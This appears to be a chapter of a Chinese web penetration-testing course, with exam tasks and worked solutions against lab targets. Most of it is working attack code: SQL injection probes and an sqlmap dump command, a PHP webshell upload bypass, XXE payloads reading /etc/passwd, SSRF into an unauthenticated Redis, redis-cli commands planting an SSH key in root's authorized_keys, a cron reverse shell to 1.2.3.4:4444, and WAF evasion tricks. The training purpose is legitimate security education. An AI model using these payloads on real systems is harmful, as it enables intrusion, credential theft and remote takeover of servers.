6.1 课程讲解与实战考核
6.1.1 SQL注入篇考核
考核目标:通过手动注入与工具结合,获取目标数据库敏感信息。
题目示例:
目标URL:
http://vuln-site.com/product?id=1
要求:
判断注入类型(联合查询/报错注入/布尔盲注)。
获取数据库名称、表名及用户密码字段。
使用Sqlmap自动化验证结果。
解题思路:
- 探测注入点:
http://vuln-site.com/product?id=1' AND 1=1-- // 正常响应
http://vuln-site.com/product?id=1' AND 1=2-- // 异常响应
- 联合查询注入:
' ORDER BY 3-- // 确定字段数为3
' UNION SELECT 1,2,database()--
- Sqlmap自动化:
sqlmap -u "http://vuln-site.com/product?id=1" --risk=3 --level=5 --dump
6.1.2 文件上传绕过考核
考核目标:绕过黑名单校验上传Webshell。
题目场景:
网站仅允许上传
.jpg
文件,且检测文件头与Content-Type。目标:上传PHP Webshell并触发执行。
绕过步骤:
文件头伪造:在Webshell开头添加
GIF89a
。双扩展名绕过:命名文件为
shell.jpg.php
。Burp修改Content-Type:
POST /upload.php HTTP/1.1
Content-Type: multipart/form-data
Content-Disposition: form-data; name="file"; filename="shell.jpg"
Content-Type: image/jpeg
<?php system($_GET['cmd']); ?>
6.1.3 XXE与SSRF实战考核
考核目标:利用XXE读取服务器文件,并通过SSRF攻击内网服务。
题目环境:
目标接口:XML数据解析端点(
/api/parse
)。内网存在未授权Redis服务(
192.168.1.100:6379
)。
解题步骤:
- XXE读取/etc/passwd:
<!DOCTYPE test [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<data>&xxe;</data>
- SSRF探测内网Redis:
<!DOCTYPE test [<!ENTITY ssrf SYSTEM "http://192.168.1.100:6379">]>
- Redis未授权写SSH密钥:
redis-cli -h 192.168.1.100 flushall
echo -e "\n\nssh-rsa AAAAB3NzaC... user@kali" | redis-cli -h 192.168.1.100 -x set payload
redis-cli -h 192.168.1.100 config set dir /root/.ssh
redis-cli -h 192.168.1.100 config set dbfilename "authorized_keys"
redis-cli -h 192.168.1.100 save
6.2 扩展知识与高阶技巧
6.2.1 常见WAF绕过技巧
- 分块传输编码:
POST /login.php HTTP/1.1
Transfer-Encoding: chunked
7\r\n
user=ad\r\n
6\r\n
min&pass=1\r\n
0\r\n
- 注释符混淆:
' UN/**/ION SEL/**/ECT 1,2,3--
6.2.2 未授权漏洞实战(Redis)
攻击链:
发现Redis未授权访问:
nmap -p 6379 192.168.1.0/24
。写入定时任务反弹Shell:
redis-cli -h 192.168.1.100
config set dir /var/spool/cron
config set dbfilename root
set payload "* * * * * bash -i >& /dev/tcp/1.2.3.4/4444 0>&1"
save
6.3 考核评分标准
基础分(60%):完成漏洞利用的核心步骤(如注入成功、文件上传、权限获取)。
进阶分(30%):绕过防御机制(如WAF、加密参数)。
创新分(10%):提出新颖攻击链或自动化脚本(如结合多个漏洞横向移动)。
模拟考核环境搭建指南
- Docker快速部署漏洞靶场:
docker run -d -p 80:80 vulnerables/web-dvwa
Kali工具集成:预装Sqlmap、Burp Suite、CobaltStrike。
日志监控:使用ELK堆栈记录攻击行为,用于事后复盘。
下期预告
终章:综合实战演练——从信息收集到内网渗透,还原真实红队攻击全流程!